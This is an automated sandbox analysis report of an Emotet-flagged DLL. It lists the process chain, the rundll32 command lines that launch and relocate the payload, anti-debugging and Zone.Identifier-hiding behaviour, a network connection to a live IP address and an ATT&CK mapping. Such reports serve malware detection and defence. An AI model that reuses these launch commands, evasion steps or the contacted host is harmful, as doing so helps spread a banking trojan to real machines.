Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04806FC4	6_2_04806FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480A3DF	6_2_0480A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048055E8	6_2_048055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481BFE8	6_2_0481BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048203F1	6_2_048203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480C5FE	6_2_0480C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04803502	6_2_04803502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04802309	6_2_04802309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481FD10	6_2_0481FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480251C	6_2_0480251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04805923	6_2_04805923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04806B25	6_2_04806B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0482292B	6_2_0482292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04820B34	6_2_04820B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04821343	6_2_04821343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04803345	6_2_04803345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481F14D	6_2_0481F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480C158	6_2_0480C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04803F5C	6_2_04803F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04811F6B	6_2_04811F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481056A	6_2_0481056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481577E	6_2_0481577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481748A	8_2_0481748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480AC95	8_2_0480AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048178A5	8_2_048178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048144AA	8_2_048144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04805AB2	8_2_04805AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04817ED1	8_2_04817ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048208D1	8_2_048208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481ECE3	8_2_0481ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481DEF4	8_2_0481DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048030F6	8_2_048030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480220A	8_2_0480220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480441E	8_2_0480441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04815220	8_2_04815220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480EC27	8_2_0480EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481F83F	8_2_0481F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04802043	8_2_04802043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04803845	8_2_04803845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04809384	8_2_04809384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480758F	8_2_0480758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04812FA2	8_2_04812FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04814BAA	8_2_04814BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480BFB6	8_2_0480BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04806FC4	8_2_04806FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048055E8	8_2_048055E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480C5FE	8_2_0480C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04820B34	8_2_04820B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04807283	8_2_04807283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04820687	8_2_04820687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04814E8A	8_2_04814E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480CC8D	8_2_0480CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481D091	8_2_0481D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04803C91	8_2_04803C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481AC9B	8_2_0481AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480FEA0	8_2_0480FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481D6A7	8_2_0481D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481CAA8	8_2_0481CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480DAAE	8_2_0480DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048190BA	8_2_048190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048198BD	8_2_048198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481BEC9	8_2_0481BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481CCD4	8_2_0481CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04810ADE	8_2_04810ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481AEEB	8_2_0481AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481A8F0	8_2_0481A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04804C00	8_2_04804C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04808C09	8_2_04808C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04801A0A	8_2_04801A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04811C10	8_2_04811C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480E21C	8_2_0480E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480F41F	8_2_0480F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04809E22	8_2_04809E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480D223	8_2_0480D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04821A3C	8_2_04821A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481E441	8_2_0481E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04802A46	8_2_04802A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480A048	8_2_0480A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04802654	8_2_04802654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04809A57	8_2_04809A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481406E	8_2_0481406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04801C76	8_2_04801C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04814D8D	8_2_04814D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04804F8E	8_2_04804F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480FD91	8_2_0480FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04821193	8_2_04821193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481B397	8_2_0481B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481D99A	8_2_0481D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04819DA1	8_2_04819DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048143B3	8_2_048143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04817BB2	8_2_04817BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481B1B5	8_2_0481B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048225C3	8_2_048225C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480A3DF	8_2_0480A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481BFE8	8_2_0481BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_048203F1	8_2_048203F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04803502	8_2_04803502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04802309	8_2_04802309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481FD10	8_2_0481FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480251C	8_2_0480251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04805923	8_2_04805923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04806B25	8_2_04806B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0482292B	8_2_0482292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04821343	8_2_04821343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04803345	8_2_04803345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481F14D	8_2_0481F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0480C158	8_2_0480C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04803F5C	8_2_04803F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04811F6B	8_2_04811F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481056A	8_2_0481056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481577E	8_2_0481577E

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10041CAB appears 78 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10041DB8 appears 35 times

Source: MakbLShaqA.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj",wpBD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wuapihost.exe C:\Windows\System32\wuapihost.exe -Embedding
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj",wpBD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winDLL@18/0@0/20

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_04811B54 CreateToolhelp32Snapshot,

8_2_04811B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10016810 LockResource,

2_2_10016810

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\wuapihost.exe	Automated click: OK

Source: MakbLShaqA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MakbLShaqA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MakbLShaqA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MakbLShaqA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MakbLShaqA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10041D83 push ecx; ret	2_2_10041D96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10041DFD push ecx; ret	2_2_10041E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C1229 push eax; retf	2_2_048C129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01121229 push eax; retf	3_2_0112129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04801229 push eax; retf	6_2_0480129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04801229 push eax; retf	8_2_0480129A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1004D1EA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_1004D1EA

Source: MakbLShaqA.dll

Static PE information: real checksum: 0xadad1 should be: 0xa7dab

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1000C188 IsIconic,GetWindowPlacement,GetWindowRect,

2_2_1000C188

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 2128

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100331CA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		2_2_100331CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04811A80 FindFirstFileW,		8_2_04811A80

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 0000000F.00000002.800737623.000001AFFB2C5000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.800779486.000001AFFB2EC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000F.00000002.800688440.000001AFFB2A5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_100441C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_100441C0

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_1004D1EA

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DDE10 mov eax, dword ptr fs:[00000030h]	2_2_048DDE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113DE10 mov eax, dword ptr fs:[00000030h]	3_2_0113DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481DE10 mov eax, dword ptr fs:[00000030h]	6_2_0481DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0481DE10 mov eax, dword ptr fs:[00000030h]	8_2_0481DE10

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100441C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_100441C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1004A1EC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_1004A1EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1003F29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1003F29E

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1

Jump to behavior

Source: rundll32.exe, 00000008.00000002.1189125085.0000000003230000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000008.00000002.1189125085.0000000003230000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000008.00000002.1189125085.0000000003230000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000008.00000002.1189125085.0000000003230000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,		2_2_100199B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,		2_2_1004DE0C

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10048D61 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_10048D61

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1000BFE6 _memset,GetVersionExA,

2_2_1000BFE6

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.47d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.51e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5280000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4720000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ed0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5130000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5190000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5190000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5280000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5340000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.c40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4720000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4f20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5180000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.11e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.11e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ed0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5340000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4f20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5130000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5180000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.47d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.51e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1189207323.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673846503.0000000005340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1189697004.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.675902171.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673692438.0000000005180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673414231.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.671474262.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673772227.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1191193523.0000000005280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1188619609.0000000000C40000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1192917717.00000000054B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1190789322.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1190983661.0000000005190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673534046.0000000004F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1191434317.00000000053A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1189594475.0000000004DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.672601122.00000000011E0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection112	Masquerading2	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
